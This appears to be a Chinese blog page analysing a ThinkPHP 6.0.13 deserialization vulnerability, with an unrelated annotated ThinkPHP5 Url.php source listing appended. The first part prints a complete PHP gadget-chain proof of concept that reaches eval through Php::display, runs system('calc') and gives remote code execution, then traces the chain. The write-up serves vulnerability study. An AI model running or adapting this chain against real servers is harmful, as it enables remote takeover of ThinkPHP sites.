Think PHP 6.0.13反序列化分析
Posted qq_60481227
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Think PHP 6.0.13反序列化分析相关的知识,希望对你有一定的参考价值。
原poc链接:https://github.com/top-think/framework/issues/2749
think PHP 6.0.13下载
composer create-project topthink/think tppoc源码
<?php
namespace League\\Flysystem\\Cached\\Storage
class Psr6Cache
private $pool;
protected $autosave = false;
public function __construct($exp)
$this->pool = $exp;
namespace think\\log
class Channel
protected $logger;
protected $lazy = true;
public function __construct($exp)
$this->logger = $exp;
$this->lazy = false;
namespace think
class Request
protected $url;
public function __construct()
$this->url = '<?php system(\\'calc\\'); exit(); ?>';
class App
protected $instances = [];
public function __construct()
$this->instances = ['think\\Request'=>new Request()];
namespace think\\view\\driver
class Php
namespace think\\log\\driver
class Socket
protected $config = [];
protected $app;
protected $clientArg = [];
public function __construct()
$this->config = [
'debug'=>true,
'force_client_ids' => 1,
'allow_client_ids' => '',
'format_head' => [new \\think\\view\\driver\\Php,'display'], # 利用类和方法
];
$this->app = new \\think\\App();
$this->clientArg = ['tabid'=>'1'];
namespace
$c = new think\\log\\driver\\Socket();
$b = new think\\log\\Channel($c);
$a = new League\\Flysystem\\Cached\\Storage\\Psr6Cache($b);
echo base64_encode(serialize($a));
分析
从POC开始分析
起始类是Psr6Cache类,但是在Psr6Cache类中没有发现__destruct()方法,在定义类的地方发现其继承了AbstractCache类。通过全局查找__destruct方法定位到src/Storage/AbstractCache.php
这里对autosave变量进行判断是否为false,$autosave是成员变量可以控制,后调用了save方法,跟进save方法
调用了pool的getItem方法,这里AbstractCache->pool是可控的,找一下__call方法,根据POC找到Channel.php
调用了log方法,再跟进record方法(记录日志信息)
在record方法中的前三个判断都可以过,主要看第四个判断,因为这里是要利用$this->save方法
$lazy默认是true不可控,但是$this->lazy是成员变量可控,因此可以进入save方法。继续 跟进save方法。
在save方法判断了$this-event是否有值,这里默认是没有的,可以跳过,到$this->logger->save()
这里调用了$this->logger记录器的save方法,然而这里的logger是成员变量,是可控的。根据POC可以发现这里利用了socket的save方法
namespace think\\log
class Channel
protected $logger;
protected $lazy = true;
public function __construct($exp)
//$exp=new socket()
$this->logger = $exp;
$this->lazy = false;
全局找一下save方法,继续跟进socket的save方法
这里首先对自身进行了检查,不通过就返回false,这里我们必须要check方法返回true,跟进check方法。check方法的主要功能是获取用户输入的taid参数、检查是否记录日志和用户认证。
这里看一下检查request实例对象的分支
这里在POC中给了App中request的实例对象
再回到socket的save方法
判断debug是否开启,这里可控。这里有判断了$this->app的request实例对象是否存在,这里可以直接进入,然后获取request实例对象的url的值(这个值是重点)。然后判断this->config['format_head']是否存在,存在的话就调用$this->app的inoke方法,尝试调用反射执行this->config['format_head']的方法,参数是$currentUri。在这里我们只要找到可以执行危险操作的危险函数,并将其控制到this->config['format_head']里面就可以进行RCE了。而这个config是一个成员变量,是可控的,因此只要寻找危险方法就可以了。这里POC找的是Php类的display方法,里面存在eval函数。
POC通过控制config即可控制程序执行到Php类的display方法。
在POC中控制了App对象中request实例对象的url的值
(socket)$this->app->request->url='<?php system(\\'calc\\'); exit(); ?>']
在display方法中执行eval('?><?php system(\\'calc\\'); exit(); ?>'),成功调用系统计算器
此次反序列化漏洞主要需要控制的点,是在Socket类中的变量控制,和Php中的display方法的利用。还要一点就是在构造POC时Psr6Cache类的pool变量必须要写在前面,否则生成的payload是无效的。。。自己在仿造POC时调试了很久。
此次分析就到这吧,感谢秋秋晚的指点
[李景山php]每天TP5-20170116|thinkphp5-Url.php-1
namespace think;
use think\Config;
use think\Loader;
use think\Request;
use think\Route;
// 使用 think 里面,内置的 Config Loader Request Route
class Url
{
// 生成URL地址的root
protected static $root;// 根地址
/**
* URL生成 支持路由反射
* @param string $url 路由地址
* @param string|array $vars 参数(支持数组和字符串)a=val&b=val2... [‘a‘=>‘val1‘, ‘b‘=>‘val2‘]
* @param string|bool $suffix 伪静态后缀,默认为true表示获取配置值
* @param boolean|string $domain 是否显示域名 或者直接传入域名
* @return string
*/
public static function build($url = ‘‘, $vars = ‘‘, $suffix = true, $domain = false)
{// url 支持路由反射 $url 路由地址 $vars 参数 a=val b=val2 后缀 是否显示域名
if (false === $domain && Config::get(‘url_domain_deploy‘)) {// 如果配置文件支持 域名 设置的话,可以设置过来
$domain = true;
}
// 解析URL
if (0 === strpos($url, ‘[‘) && $pos = strpos($url, ‘]‘)) {// 如果是用 路由规则的方式 [name]
// [name] 表示使用路由命名标识生成URL
$name = substr($url, 1, $pos - 1);// 获取 路由标识 字符串
$url = ‘name‘ . substr($url, $pos + 1); // 拼接 成为 新的 字符串
}
$info = parse_url($url);// 根据 url 解析,暂时中断一下
//var_dump(parse_url(‘home/index/index‘));
//array(1) { ["path"]=> string(16) "home/index/index" }
// 中断一下 系统函数 应该会解析返回一个数组 关系
// 尝试一下 parse_url(‘home/index/index‘)---->输出什么
$url = !empty($info[‘path‘]) ? $info[‘path‘] : ‘‘;// 为空 代表 路径
if (isset($info[‘fragment‘])) {// 如果存在锚点
// 解析锚点
$anchor = $info[‘fragment‘];// 获取锚点信息
if (false !== strpos($anchor, ‘?‘)) {
// 解析参数
list($anchor, $info[‘query‘]) = explode(‘?‘, $anchor, 2);// 解析参数
}
if (false !== strpos($anchor, ‘@‘)) {
// 解析域名
list($anchor, $domain) = explode(‘@‘, $anchor, 2);// 解析域名
}
} elseif (strpos($url, ‘@‘)) {// 存在域名
// 解析域名
list($url, $domain) = explode(‘@‘, $url, 2);
}
// 解析参数
if (is_string($vars)) {
// aaa=1&bbb=2 转换成数组
parse_str($vars, $vars);// 解析字符串 为数组 默认推荐传入数组格式
}
if ($url) {// 如果 url 存在
$rule = Route::name(isset($name) ? $name : $url . (isset($info[‘query‘]) ? ‘?‘ . $info[‘query‘] : ‘‘));
// 规则 等于 路由优先 有路由先看路由,然后用 url 拼接参数
if (is_null($rule) && isset($info[‘query‘])) {// 如果 url 为空,但是设置了参数
$rule = Route::name($url);// 获取 name
// 解析地址里面参数 合并到vars
parse_str($info[‘query‘], $params);// 解析参数
$vars = array_merge($params, $vars);// 合并参数
unset($info[‘query‘]);//删除信息
}
}
if (!empty($rule) && $match = self::getRuleUrl($rule, $vars)) {// 如果规则不为空,并且 也能匹配到对应的路由标识
// 匹配路由命名标识
$url = $match[0];// 分别 返回 url
if (!empty($match[1])) {
$domain = $match[1];//域名
}
} elseif (!empty($rule) && isset($name)) {// 如果不为空 设置名字
throw new \InvalidArgumentException(‘route name not exists:‘ . $name);// 抛出异常
} else {
if (isset($info[‘query‘])) {
// 解析地址里面参数 合并到vars
parse_str($info[‘query‘], $params);
$vars = array_merge($params, $vars);
}
// 路由标识不存在 直接解析
$url = self::parseUrl($url, $domain);// 路由不存在,就直接解析
}
// 检测URL绑定
$type = Route::getBind(‘type‘);
if ($type) {
$bind = Route::getBind($type);
if (0 === strpos($url, $bind)) {
$url = substr($url, strlen($bind) + 1);
}
}
// 还原URL分隔符
$depr = Config::get(‘pathinfo_depr‘);
$url = str_replace(‘/‘, $depr, $url);
// URL后缀
$suffix = in_array($url, [‘/‘, ‘‘]) ? ‘‘ : self::parseSuffix($suffix);
// 锚点
$anchor = !empty($anchor) ? ‘#‘ . $anchor : ‘‘;
// 参数组装
if (!empty($vars)) {
// 添加参数
if (Config::get(‘url_common_param‘)) {
$vars = urldecode(http_build_query($vars));
$url .= $suffix . ‘?‘ . $vars . $anchor;
} else {
foreach ($vars as $var => $val) {
if (‘‘ !== trim($val)) {
$url .= $depr . $var . $depr . urlencode($val);
}
}
$url .= $suffix . $anchor;
}
} else {
$url .= $suffix . $anchor;
}
// 检测域名
$domain = self::parseDomain($url, $domain);
// URL组装
$url = $domain . (self::$root ?: Request::instance()->root()) . ‘/‘ . ltrim($url, ‘/‘);
return $url;
// 此处的重点 是 root 是否可以获取 root 资源里面 index.php 这个后缀
}
// 直接解析URL地址
protected static function parseUrl($url, $domain)// 解析 你的 URL 跟 系统的解析 应该不一样吧
{
$request = Request::instance();// 获取 请求的 实例化
if (0 === strpos($url, ‘/‘)) {// 如果是 根目录形式的 直接解析
// 直接作为路由地址解析
$url = substr($url, 1);
} elseif (false !== strpos($url, ‘\\‘)) {// 这种写法 跟 类 命名空间相似
// 解析到类
$url = ltrim(str_replace(‘\\‘, ‘/‘, $url), ‘/‘);// 直接替换称为 url
} elseif (0 === strpos($url, ‘@‘)) {// 如果 有@ 符号,代表为控制器
// 解析到控制器
$url = substr($url, 1);
} else {
// 解析到 模块/控制器/操作
// 默认的大部分 应该就是这种情况
$module = $request->module();// 获取模块 名字
$domains = Route::rules(‘domain‘);// 获取域名 规则
if (isset($domains[$domain][‘[bind]‘][0])) {// 如果关于这个规则 存在
$bindModule = $domains[$domain][‘[bind]‘][0];// 二级域名自动映射模块
if ($bindModule && !in_array($bindModule[0], [‘\\‘, ‘@‘])) {
$module = ‘‘;// 模型为空
}
} else {
$module = $module ? $module . ‘/‘ : ‘‘;// 空模型
}
$controller = Loader::parseName($request->controller());// 控制器
if (‘‘ == $url) {
// 空字符串输出当前的 模块/控制器/操作
$url = $module . $controller . ‘/‘ . $request->action();// 空的输出当前的
} else {// 重新 获取 这些
$path = explode(‘/‘, $url);
$action = Config::get(‘url_convert‘) ? strtolower(array_pop($path)) : array_pop($path);
$controller = empty($path) ? $controller : (Config::get(‘url_convert‘) ? Loader::parseName(array_pop($path)) : array_pop($path));
$module = empty($path) ? $module : array_pop($path) . ‘/‘;
$url = $module . $controller . ‘/‘ . $action;
}
}
return $url;// 返回 模型/控制器/方法
}本文出自 “专注php 群号:414194301” 博客,请务必保留此出处http://jingshanls.blog.51cto.com/3357095/1882473
以上是关于Think PHP 6.0.13反序列化分析的主要内容,如果未能解决你的问题,请参考以下文章